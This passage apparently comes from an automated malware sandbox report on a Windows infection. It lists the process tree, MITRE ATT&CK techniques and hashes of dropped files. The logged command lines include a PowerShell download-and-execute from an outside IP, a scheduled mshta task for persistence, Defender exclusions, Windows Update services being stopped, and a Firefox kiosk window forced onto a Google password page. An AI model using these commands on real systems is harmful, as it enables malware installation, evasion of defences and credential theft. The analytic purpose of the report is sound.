        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        
        PID:3880
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff96120cc40,0x7ff96120cc4c,0x7ff96120cc58
        6⤵
        
        PID:2552
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1896 /prefetch:2
        6⤵
        
        PID:1004
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2196,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1896 /prefetch:3
        6⤵
        
        PID:180
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2200 /prefetch:8
        6⤵
        
        PID:2544
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3220 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5204
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3428,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3448 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5212
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4560 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5588
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3684,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4740 /prefetch:2
        6⤵
        
        PID:5876
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,7778745645406733738,7872634602742786128,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4732 /prefetch:2
        6⤵
        
        PID:5436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:6096
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff958e546f8,0x7ff958e54708,0x7ff958e54718
        6⤵
        
        PID:3292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=65755952365568 --process=176 /prefetch:7 --thread=5592
        7⤵
        
        PID:5532
  - - C:\Users\Admin\AppData\Local\Temp\1074043001\81d8d6ec5a.exe
      "C:\Users\Admin\AppData\Local\Temp\1074043001\81d8d6ec5a.exe"
      4⤵
      PID:6064
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:3812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:5700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:5132
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:5796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:6016
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:3824
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:5112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1880 -prefsLen 27190 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d0952ca-31cf-4a19-a556-66b4c3d23d12} 5112 "\\.\pipe\gecko-crash-server-pipe.5112" gpu
        7⤵
        
        PID:5204
        
        C:\Program Files\Mozilla Firefox\crashreporter.exe
        
        "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yvvnkq0l.default-release\minidumps\4b0943cf-d5be-4a46-b803-79736d2fdd54.dmp"
        7⤵
        
        PID:5176
  - - C:\Users\Admin\AppData\Local\Temp\1074044001\9cd7963ec3.exe
      "C:\Users\Admin\AppData\Local\Temp\1074044001\9cd7963ec3.exe"
      4⤵
      PID:5480
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn U5SIzmaVEB7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sazZwG7E4.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        
        PID:5280
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn U5SIzmaVEB7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sazZwG7E4.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3628
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\sazZwG7E4.hta
        5⤵
        
        PID:5208
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XVMQHLZEX6Y5J4FLWXLYVC4CH65TM9S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3620

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3792

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3952

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1728

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2956

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3776

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2996
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1648 -ip 1648
  2⤵
  PID:1824

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:3324

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NTI5MDMwQTItOTYxMS00QkU2LTg2MUUtMjNCRkI4MzU1OTZGfSIgdXNlcmlkPSJ7QUM4MDQxMjctNjgxRi00NzM5LTlGRDEtNjI4RjdFRjk0RDhFfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7M0JFOTk5NDgtODhDNy00N0NCLUJCQkItNzRCN0Q4MUMyNTVCfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU1NzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODAxNjUyMzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0ODgwMzY5MDIxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2044

C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe
C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1776
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4920
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3444
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4004
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4296
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4388
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3156
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2828
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4856
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2736
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4832
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4648
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1512

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\RTAX1IlWZ.hta

Filesize
782B

MD5
16d76e35baeb05bc069a12dce9da83f9

SHA1
f419fd74265369666595c7ce7823ef75b40b2768

SHA256
456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

SHA512
4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

Download Submit
C:\UMLOU\mmytljldrgl.exe

Filesize
3.1MB

MD5
766e053d13e4f6750e8f694efb00fad0

SHA1
2a0e1ca7711795dfe50231d03ab7d0349014df5e

SHA256
0502a8da4a9f46a7375766b83d181aa9f38e9969b10801f80736a3598410a281

SHA512
3de1970fc083d404a28827f25e0ff4f096d6b75a2c2367bff0476857f5e217da3f6c40f531c2b835b31233bde53bc51086c6784985294e97ce21523bbef2bd7f

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
26fdf90f437469fbb9ee554abee0a5de

SHA1
287bc2a46f4465ae3c589d479c43e524c5707f0d

SHA256
9acf54439651323294e92ce433e47d03845bbd6da68c7dd9f06d01dfa56aea25

SHA512
4d52fc3e31c8b9b59f27b815fca61d11890c6247bf459d4626ed04881853faa1b5b227f77eb24bc14c5149e33a3e5f5a3cf9b5c211496ba6778e19c0e267a835

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\1b7057a9-e179-411e-9625-639b2504fd66.dmp

Filesize
115KB

MD5
1c2a6f4143d08ea69c54269a775cd37e

SHA1
dbcde88feb51fff046743b983cd9f3089897233a

SHA256
9d486986c7e830900fa678abfb95cf1bddb78aba2dde2eb53a0ae8cf38ef5c2c

SHA512
73d71ae29dd86a5663117645eb7c7603d3b2923494feb4ec122ad932686d58b3733d2ef870b99577c1649a561c924351ec88e926c5949b0c91d0dad32f18e11d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
622bf737a997b9a257f15dc3b9ee9da5

SHA1
6beba023f9c081393b64de079969e948a47be8be

SHA256
bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7

SHA512
c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
cbe40b683eb2c478ed1ed77677a96ac3

SHA1
0dabaf892dc17423d6fd307a1e36b0cb999b32dc

SHA256
4b7ae373334d86628704ab4e83dea10f0b7e96425dd4a0560c48a98ff3540d49

SHA512
48c04cfc2a38ae0dbf28e4b2430f69295b8acf6e93d7db3111cf9b8e744f722b1708019bcec6f26e5a46482a2ce842a957cefc2cd9fb9c59cfc84203bacdaf9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b79744e74e2a70dc6da0b381d41590ee

SHA1
e4d6ca7be84bc8d2d118af038619e050c8729c0e

SHA256
bd001563fba8eb964f80271db1140e58f696d6d7ea20b60e23b5c91fc09b690f

SHA512
10efa4414f75f74b9db7c835520a13c1230c1040b5f36747e166b6fd79d317f71df355ba093eed72065ac71f086822e2696bb6eed7d2cd7eaa02044e602fcd8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\3RYO3M83\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
3337d66209faa998d52d781d0ff2d804

SHA1
6594b85a70f998f79f43cdf1ca56137997534156

SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
dcbefa7e2e8968484065960cab57246f

SHA1
4affb259fc03e7fdba1a5835b5ce9e34f169a354

SHA256
b85cc75a7fb46d0025962367407c796bd1fe365ade0fdf1c05d25ddddb846514

SHA512
35b951dcac2b9ec53c68daf82561e80340622256eb58ce08996c2782a5784f941c0971970dbc47af61659695484f498bee05e12d6275e35fdcb104ca2755d8e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
78c09b2dfa7f5fd3121cb7fca3fa6502

SHA1
b1ff3689ac159116b20741c8a41d6e5af083a56e

SHA256
e704b4ef52d0574b9916bb943f54dbd572297b42d7b66adece7ecc5fa23feb3a

SHA512
ac4449a3e2b11c0798ec25cc16b0f5c800ad6a586efd0d2b68dc555cba1d349a4eb28147a0492fa54ebec767fc4f16660f9406bbf6bd0fd687ae8950717120f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
db05032adc384de66490a8b7da751e50

SHA1
6f2e98434db9af5739b1af2092caff10b8f64f33

SHA256
274b3f1893b38637adb47203f8ffb8c2bfd1ecb5e31a93578e7339a0aaed95f5

SHA512
ffb9daf3863e24bde0e05aa2fe3e21aa78cffd5ef6f8857b59beff9fedb1c97be29b01d0c3d8fbd903726b623ad22e2caa8c9a5b75d7ad888b209630c5b48c47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
242864fa38cfb42f8eed89a9a80b510d

SHA1
0981832f0e0ce28fc8dc011072e9f6579d8b16de

SHA256
d409c32deeb1808a9116227000bbeb40b15a3b33bd4c2f16c97ce3b590201442

SHA512
33650c0e18790d0ee0ef772941b03728cb3aa993b79a23287fb1d3ddf17194cd7dba40539c76384d21265b64c25c38ff99ac2caa416611c6f236b0dd9634b0b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
b861b924a37c2d0238c3a48ef2360800

SHA1
37134f0855d7a533414702ab4a215d1077049f18

SHA256
b5634127e8833272f21726239d3d521b7585e28be48a944929c8b21b218469b2

SHA512
b711390e2a51a42b111b45261b6e8e1aa1610e4445d79f093168b9d0acb8c847410156bb0245d5a9116e3bf4183c44e8a0b3c1dd6f89d0638eb53fa437654dcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
f029890a8dc00aac2c576ecd4317ace8

SHA1
ecf6d8c330b05bc24fd4d7806ed3e082daa59741

SHA256
0a49af6588d1eda11c71df2ef737b8dfc9f89c54561e7486b7814958f8c3f041

SHA512
7d0616d5faf53506cebc5f19acbb91c1d474d0a099410b51be06d496619c731632c1b0a77092ef7b21dd3790a283cc8cffb3ea146c0c107eaff3ee58102d6077

Download Submit
C:\Users\Admin\AppData\Local\TempAWZW6SGGF1BX3JWWUIZKVD4Z1IJLXGA1.EXE

Filesize
